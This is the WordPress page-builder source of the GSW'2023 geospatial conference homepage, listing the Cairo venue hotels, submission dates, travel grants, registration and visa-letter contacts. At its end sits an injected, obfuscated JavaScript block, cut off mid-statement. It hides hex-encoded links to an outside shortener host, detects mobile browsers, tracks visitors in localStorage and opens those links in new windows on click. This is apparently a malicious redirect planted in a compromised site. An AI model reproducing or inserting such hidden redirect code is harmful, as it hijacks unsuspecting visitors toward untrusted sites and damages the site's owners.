center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 